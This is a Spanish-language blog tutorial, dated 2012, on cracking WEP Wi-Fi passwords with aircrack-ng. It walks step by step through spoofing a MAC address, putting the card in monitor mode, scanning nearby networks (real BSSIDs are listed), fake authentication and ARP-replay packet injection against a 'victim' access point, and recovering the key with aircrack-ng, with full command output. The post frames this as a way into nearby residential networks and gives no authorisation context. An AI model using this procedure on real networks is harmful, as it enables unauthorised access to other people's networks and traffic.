Aunque la seguridad a través de redes wifi WEP esta siendo sustituida por WPA/WPA2 hay varios proveedores de enlaces residenciales que siguen utilizándola para sus equipos de comunicación, que es el caso de la empresa Claro en mi país, por lo cual cada vez hay mas y mas equipos WEP regados por allí.
Romper, crackear o descifrar claves de redes wifi WEP es relativamente facil...
Que necesitamos?
1. Que la red a la que queremos conectarnos este relativamente cerca, la inyección de paquetes no funcionara si la señal que nos llega es pobre :( personalmente he probado este metodo con señales de buena a excelentes.
2. Software para romper las claves WEP, personalmente uso aircrack ya que utilizo Linux y es el que utilizare en este caso :)
3. Una tarjeta que pueda inyectar paquetes, la tarjeta intel que trae mi laptop no lo puede hacer, por lo que utilizo una TP-LINK TL-WN422G High-Gain, que es muy barata y anda por los $22.00, podemos ver un listado de tarjetas compatibles con aircrack en este link
http://www.aircrack-ng.org/doku.php?id=compatibility_drivers
Manos a la obra!!!
Lo primero que hago es bajar mi tarjeta inalambrica
# ifconfig wlan0 down
Luego utilizo macchanger para cambiar la macaddress de mi tarjeta :)
# macchanger --mac 00:11:22:33:44:55 wlan0
Current MAC: f4:ec:38:8a:37:03 (unknown)
Faked MAC: 00:11:22:33:44:55 (Cimsys Inc)
Pongo mi tarjeta en modo de monitoreo y la levanto
# iwconfig wlan0 mode monitor
# ifconfig wlan0 up
Escaneamos que redes estan disponibles en mi area, en este caso tengo un AP con ssid nexxt que es al que nos conectaremos, para el escaneo utilizo el siguiente comando:
# airodump-ng wlan0
El cual me retornara algo parecido a lo siguiente donde veo la todas las redes cercanas entre las que esta nexxt
CH 12 ][ Elapsed: 36 s ][ 2012-09-02 06:17
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:90:D0:FA:0A:72 -1 0 0 0 108 -1
08:10:74:39:1C:7A -56 60 0 0 1 54 WEP WEP nexxt
00:24:17:B7:39:B5 -56 36 0 0 1 54 WEP WEP TURBONETT
00:24:17:B6:F6:27 -62 40 0 0 1 54 WEP WEP TURBONETT
00:24:17:B7:11:83 -73 9 0 0 1 54 WEP WEP TURBONETT
80:C6:AB:AE:52:B9 -74 73 0 0 11 54e WEP WEP TURBONETT_758
38:72:C0:85:3C:9A -83 9 0 0 1 54 WEP WEP MundoMario
14:D6:4D:2F:CA:06 -87 27 0 0 6 54e. WPA2 CCMP PSK tacoloco
00:21:91:4D:87:D4 -87 17 0 0 6 54e WEP WEP FVilleda
BSSID STATION PWR Rate Lost Packets Probes
00:90:D0:FA:0A:72 E0:B9:BA:A6:FA:B8 -81 0 -11 0 3
38:72:C0:85:3C:9A 18:60:C0:85:3C:9A -84 0 - 1 0 1
00:21:91:4D:87:D4 00:21:91:4D:56:F0 -87 0 - 1 0 1
Iniciamos la captura de paquetes con el siguiente comando, "-c 1" es el canal en el que esta transmitiendo nuestro AP victima, "-w nexxt" es el archivo en el que se guardara la captura, "--bssid ..." es la macaddress del AP que deseamos crackear este dato lo averiguamos con el comando anterior.
#
airodump-ng -c 1 -w nexxt --bssid 08:10:74:39:1C:7A wlan0
Lo cual nos retornara un resultado dinámico como el siguiente:
CH 1 ][ Elapsed: 20 s ][ 2012-09-02 06:22
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:10:74:39:1C:7A -72 100 216 11 0 1 54 WEP WEP nexxt
BSSID STATION PWR Rate Lost Packets Probes
Abrimos una segunda terminal y ejecutamos el siguiente comando:
# aireplay-ng -1 0 -a 08:10:74:39:1C:7A -h 00:11:22:33:44:55 -e nexxt wlan0
Que me retorna el siguiente resultado, aqui lo importante es que al final reporte que la asociación a sido exitosa...
06:24:25 Waiting for beacon frame (BSSID: 08:10:74:39:1C:7A) on channel 1
06:24:25 Sending Authentication Request (Open System) [ACK]
06:24:25 Authentication successful
06:24:25 Sending Association Request [ACK]
06:24:25 Association successful :-) (AID: 1)
Luego en esa misma terminal ejecutamos el siguiente comando, "-h ..." es la macaddress falsa que pusimos a nuestra tarjeta wifi...
# aireplay-ng -3 -b 08:10:74:39:1C:7A -h 00:11:22:33:44:55 wlan0
El cual retorna un resultado dinámico como el siguiente:
06:26:08 Waiting for beacon frame (BSSID: 08:10:74:39:1C:7A) on channel 1
Saving ARP requests in replay_arp-0902-062608.cap
You should also start airodump-ng to capture replies.
Con el comando anterior iniciamos la inyección de paquetes lo que permitirá capturar paquetes de manera mas rápida que utilizaremos luego para descifrar la clave, en la primera terminal que es donde estamos capturando los paquetes debemos fijarnos en la columna Data, allí deberíamos de tener un mínimo de 10000 paquetes para iniciar el descifrado.
Una vez tenemos suficientes paquetes iniciamos el descifrado con el siguiente comando:
# aircrack-ng -b 08:10:74:39:1C:7A nexxt-01.cap
nexx-01.cap es el archivo donde se han guardado los paquetes, luego de unos segundos deberíamos tener un resultado como el siguiente en el cual nos revela la clave que en este caso es "hola1"... :)
Opening nexxt-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 81051 ivs.
KEY FOUND! [ 68:6F:6C:61:31 ] (ASCII: hola1 )
Decrypted correctly: 100%
La imagen siguiente muestra los pasos anteriores:
Otros links relacionados:
Al intentar instalar Aircrack 1.1 obtengo el error "linux.c:165:17: error: variable 'unused' set but not used [-Werror=unused-but-set-variable]"
Comentarios
Publicar un comentario